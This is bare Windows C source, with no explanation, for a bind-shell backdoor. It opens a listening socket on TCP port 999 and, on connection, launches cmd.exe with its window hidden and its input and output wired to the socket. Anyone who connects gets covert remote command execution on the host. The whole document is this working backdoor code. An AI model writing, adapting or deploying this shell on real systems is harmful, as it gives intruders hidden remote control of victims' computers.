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#include&lt;winsock2.h&gt;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comment(lib,"WS2_32.lib")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&lt;tchar.h&gt;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 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WSADATA wsaData;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sockaddr_in sockaddr;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PROCESS_INFORMATION ProcessInfo;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STARTUPINFO StartupInfo;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ZeroMemory(&amp;ProcessInfo,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sizeof(PROCESS_INFORMATION));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ZeroMemory(&amp;StartupInfo,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sizeof(STARTUPINFO));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ZeroMemory(&amp;wsaData,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sizeof(WSADATA));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WSAStartup(MAKEWORD(2, 2), &amp;wsaData);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TCHAR szCMDPath[255];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GetEnvironmentVariable(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TEXT("COMSPEC"),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szCMDPath,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sizeof(szCMDPath));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sockaddr.sin_family = AF_INET;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sockaddr.sin_port = htons(999);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sockaddr.sin_addr.S_un.S_addr = INADDR_ANY;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SOCKET CSocket = WSASocket(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AF_INET,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SOCK_STREAM,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IPPROTO_TCP,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NULL,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0);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bind(CSocket,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(SOCKADDR*)&amp;sockaddr,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sizeof(sockaddr));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listen(CSocket, 1);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iAddrSize = sizeof(sockaddr);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SOCKET SSocket = WSAAccept(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CSocket,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(SOCKADDR*)&amp;sockaddr,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&amp;iAddrSize,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NULL,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NULL);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StartupInfo.cb = sizeof(STARTUPINFO);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StartupInfo.wShowWindow = SW_HIDE;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StartupInfo.dwFlags =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STARTF_USESTDHANDLES |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STARTF_USESHOWWINDOW;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StartupInfo.hStdInput = (HANDLE)SSocket;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StartupInfo.hStdOutput = (HANDLE)SSocket;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StartupInfo.hStdError = (HANDLE)SSocket;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CreateProcess(NULL,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szCMDPath,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NULL,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NULL,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TRUE,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NULL,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NULL,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&amp;StartupInfo,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&amp;ProcessInfo);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closesocket(CSocket);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closesocket(SSocket);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WSACleanup();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